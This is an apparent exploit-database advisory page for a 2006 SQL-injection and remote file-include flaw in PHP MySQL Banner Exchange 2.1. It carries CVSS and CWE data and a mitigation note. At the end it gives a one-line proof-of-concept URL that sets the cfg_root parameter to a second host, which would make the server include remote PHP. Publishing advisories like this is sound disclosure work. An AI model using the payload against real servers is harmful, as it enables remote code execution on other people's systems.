header-logo
Suggest Exploit
vendor:
PHP MySQL Banner Exchange
by:
SecurityFocus
7.5
CVSS
HIGH
SQL-injection and Remote File-Include
89, 94
CWE
Product Name: PHP MySQL Banner Exchange
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:php_mysql_banner_exchange:php_mysql_banner_exchange
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PHP MySQL Banner Exchange Multiple Vulnerabilities

PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. An attacker may also leverage the remote file-include issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process.

Mitigation:

Input validation should be used to ensure that user-supplied data does not contain malicious SQL or other code. Additionally, the application should be configured to use the least-privileged account with the fewest privileges necessary to perform its function.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19240/info
  
PHP MySQL Banner Exchange is prone to multiple SQL-injection vulnerabilities and a remote file-include vulnerability because it fails to properly sanitize user-supplied input. 
  
An attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
  
An attacker may also leverage the remote file-include issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process.
  
Version 2.1 of the application is affected by these vulnerabilities; other versions may also be affected.

http://www.example.com/members.php?cfg_root=http://www.example2.com/?